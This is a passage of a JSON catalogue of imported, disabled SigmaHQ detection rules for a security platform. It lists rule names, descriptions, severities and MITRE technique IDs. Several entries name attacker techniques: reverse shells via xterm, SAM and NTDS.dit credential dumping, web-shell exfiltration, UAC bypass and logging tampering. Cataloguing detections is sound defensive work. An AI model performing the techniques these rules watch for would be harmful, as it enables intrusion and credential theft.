null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-idiagnostic-profile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4cbef972-f347-4170-b62a-8253f6168e6d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml" } }, { "id": "sigmahq-sigma-4d0083b3-580b-40da-9bba-626c19fe4033", "type": "detection", "name": "HackTool - 
CoercedPotato Named Pipe Creation", "description": "Detects the pattern of a pipe name as used by the hack tool CoercedPotato", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-coercedpotato-named-pipe-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d0083b3-580b-40da-9bba-626c19fe4033", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_hktl_coercedpotato.yml" } }, { "id": "sigmahq-sigma-4d07b1f4-cb00-4470-b9f8-b0191d48ff52", "type": "detection", "name": "DNS Query To Remote Access Software Domain From Non-Browser App", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-remote-access-software-domain-from-non-browser-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml" } }, { "id": "sigmahq-sigma-4d0af518-828e-4a04-a751-a7d03f3046ad", "type": "detection", "name": "Potential OGNL Injection Exploitation In JVM Based Application", "description": "Detects potential OGNL Injection exploitation, which may lead to RCE.\nOGNL is an expression language that is supported in many JVM based systems.\nOGNL Injection is the reason for some high profile RCE's such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ognl-injection-exploitation-in-jvm-based-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d0af518-828e-4a04-a751-a7d03f3046ad", "source_commit": "df5c6a6", "license": "DRL-1.1", 
"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/jvm/java_ognl_injection_exploitation_attempt.yml" } }, { "id": "sigmahq-sigma-4d136857-6a1a-432a-82fc-5dd497ee5e7c", "type": "detection", "name": "Sign-ins by Unknown Devices", "description": "Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sign-ins-by-unknown-devices.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d136857-6a1a-432a-82fc-5dd497ee5e7c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_unknown_devices.yml" } }, { "id": "sigmahq-sigma-4d431012-2ab5-4db7-a84e-b29809da2172", "type": "detection", "name": "Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback", "description": "Detects enabling of the \"AllowAnonymousCallback\" registry value, which allows a remote connection between computers that do not have a trust relationship.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enable-remote-connection-between-anonymous-computer-allowanonymouscallback.yaml", "quarantine_reason": "imported rule; upstream 
query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d431012-2ab5-4db7-a84e-b29809da2172", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_set_enable_anonymous_connection.yml" } }, { "id": "sigmahq-sigma-4d78a000-ab52-4564-88a5-7ab5242b20c7", "type": "detection", "name": "Change to Authentication Method", "description": "A change to an account's authentication method could indicate that an attacker has added an auth method to the account in order to keep continued access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-to-authentication-method.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d78a000-ab52-4564-88a5-7ab5242b20c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_change_to_authentication_method.yml" } }, { "id": "sigmahq-sigma-4d7cda18-1b12-4e52-b45c-d28653210df8", "type": "detection", "name": "Sysmon Driver Unloaded Via Fltmc.EXE", "description": "Detects a possible unload of the Sysmon filter driver via fltmc.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070", "T1685", "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported",
"enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-driver-unloaded-via-fltmc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d7cda18-1b12-4e52-b45c-d28653210df8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml" } }, { "id": "sigmahq-sigma-4d7f1827-1637-4def-8d8a-fd254f9454df", "type": "detection", "name": "Sysmon Application Crashed", "description": "Detects application popup reporting a failure of the Sysmon service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-application-crashed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d7f1827-1637-4def-8d8a-fd254f9454df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/application_popup/win_system_application_sysmon_crash.yml" } }, { "id": "sigmahq-sigma-4d9f2ee2-c903-48ab-b9c1-8c0f474913d0", "type": "detection", "name": "Google Cloud Storage Buckets Modified or Deleted", "description": "Detects when storage bucket is modified or deleted in Google Cloud.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-storage-buckets-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d9f2ee2-c903-48ab-b9c1-8c0f474913d0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_bucket_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-4db60cc0-36fb-42b7-9b58-a5b53019fb74", "type": "detection", "name": "AWS CloudTrail Important Change", "description": "Detects disabling, deleting and updating of a Trail", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-cloudtrail-important-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4db60cc0-36fb-42b7-9b58-a5b53019fb74", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_disable_logging.yml" } }, { "id": "sigmahq-sigma-4e25af4b-246d-44ea-8563-e42aacab006b", "type": "detection", "name": "Potential Xterm Reverse Shell", "description": "Detects usage of \"xterm\" as a potential reverse shell tunnel", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, 
"playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-xterm-reverse-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4e25af4b-246d-44ea-8563-e42aacab006b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml" } }, { "id": "sigmahq-sigma-4e2ed651-1906-4a59-a78a-18220fca1b22", "type": "detection", "name": "PUA - NirCmd Execution", "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-nircmd-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4e2ed651-1906-4a59-a78a-18220fca1b22", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_nircmd.yml" } }, { "id": "sigmahq-sigma-4e7050dd-e548-483f-b7d6-527ab4fa784d", "type": "detection", "name": "NTDS.DIT Creation By Uncommon Parent Process", "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database) by an uncommon parent process or directory", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntds-dit-creation-by-uncommon-parent-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml" } }, { "id": "sigmahq-sigma-4e762605-34a8-406d-b72e-c1a089313320", "type": "detection", "name": "Potential Fake Instance Of Hxtsr.EXE Executed", "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-fake-instance-of-hxtsr-exe-executed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4e762605-34a8-406d-b72e-c1a089313320", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_hxtsr_masquerading.yml" } }, { "id": "sigmahq-sigma-4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "type": "detection", "name": "Potential SAM Database Dump", "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-sam-database-dump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sam_dump.yml" } }, { "id": "sigmahq-sigma-4ebc877f-4612-45cb-b3a5-8e3834db36c9", "type": "detection", "name": "Webshell Hacking Activity Patterns", "description": "Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003", "T1018", "T1033", "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/webshell-hacking-activity-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"4ebc877f-4612-45cb-b3a5-8e3834db36c9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_webshell_hacking.yml" } }, { "id": "sigmahq-sigma-4eddc365-79b4-43ff-a9d7-99422dc34b93", "type": "detection", "name": "Use of Remote.exe", "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-remote-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_remote.yml" } }, { "id": "sigmahq-sigma-4ede543c-e098-43d9-a28f-dd784a13132f", "type": "detection", "name": "WinRAR Execution in Non-Standard Folder", "description": "Detects a suspicious WinRAR execution in a folder which is not the default installation folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winrar-execution-in-non-standard-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4ede543c-e098-43d9-a28f-dd784a13132f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml" } }, { "id": "sigmahq-sigma-4edf51e1-cb83-4e1a-bc39-800e396068e3", "type": "detection", "name": "Invoke-Obfuscation CLIP+ Launcher - Security", "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-clip-launcher-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml" } }, { "id": "sigmahq-sigma-4eec988f-7bf0-49f1-8675-1e6a510b3a2a", "type": "detection", "name": "Potential PendingFileRenameOperations Tampering", "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": 
false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-pendingfilerenameoperations-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml" } }, { "id": "sigmahq-sigma-4f154fb6-27d1-4813-a759-78b93e0b9c48", "type": "detection", "name": "Operator Bloopers Cobalt Strike Modules", "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/operator-bloopers-cobalt-strike-modules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" } }, { "id": "sigmahq-sigma-4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6", "type": "detection", "name": "Potential Homoglyph Attack Using Lookalike Characters in Filename", "description": "Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.\nThis is used 
as an obfuscation and masquerading technique. Only \"perfect\" homoglyphs are included; these are characters that\nare indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-homoglyph-attack-using-lookalike-characters-in-filename.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_homoglyph_filename.yml" } }, { "id": "sigmahq-sigma-4f281b83-0200-4b34-bf35-d24687ea57c2", "type": "detection", "name": "ETW Logging Disabled For SCM", "description": "Detects changes to the \"TracingDisabled\" key in order to disable ETW logging for services.exe (SCM)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/etw-logging-disabled-for-scm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f281b83-0200-4b34-bf35-d24687ea57c2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml" } }, { "id": "sigmahq-sigma-4f2cd9b6-4a17-440f-bb2a-687abb65993a", "type": "detection", "name": "Uncommon AddinUtil.EXE CommandLine Execution", "description": "Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-addinutil-exe-commandline-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f2cd9b6-4a17-440f-bb2a-687abb65993a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml" } }, { "id": "sigmahq-sigma-4f647cfa-b598-4e12-ad69-c68dd16caef8", "type": "detection", "name": "DumpStack.log Defender Evasion", "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dumpstack-log-defender-evasion.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml" } }, { "id": "sigmahq-sigma-4f6c43e2-f989-4ea5-bcd8-843b49a0317c", "type": "detection", "name": "UAC Bypass Using WOW64 Logger DLL Hijack", "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-wow64-logger-dll-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml" } }, { "id": "sigmahq-sigma-4f6edb78-5c21-42ab-a558-fd2a6fc1fd57", "type": "detection", "name": "Potential 7za.DLL Sideloading", "description": "Detects potential DLL sideloading of \"7za.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potential-7za-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f6edb78-5c21-42ab-a558-fd2a6fc1fd57", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_7za.yml" } }, { "id": "sigmahq-sigma-4f73421b-5a0b-4bbf-a892-5a7fb99bea66", "type": "detection", "name": "Mavinject Inject DLL Into Running Process", "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055.001", "T1218.013" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mavinject-inject-dll-into-running-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" } }, { "id": "sigmahq-sigma-4f77e1d7-3982-4ee0-8489-abf2d6b75284", "type": "detection", "name": "Sign-ins from Non-Compliant Devices", "description": "Monitor and alert for sign-ins where the device was non-compliant.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, 
"playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sign-ins-from-non-compliant-devices.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f77e1d7-3982-4ee0-8489-abf2d6b75284", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_noncompliant_devices.yml" } }, { "id": "sigmahq-sigma-4f7a6757-ff79-46db-9687-66501a02d9ec", "type": "detection", "name": "Active Directory Structure Export Via Ldifde.EXE", "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/active-directory-structure-export-via-ldifde-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 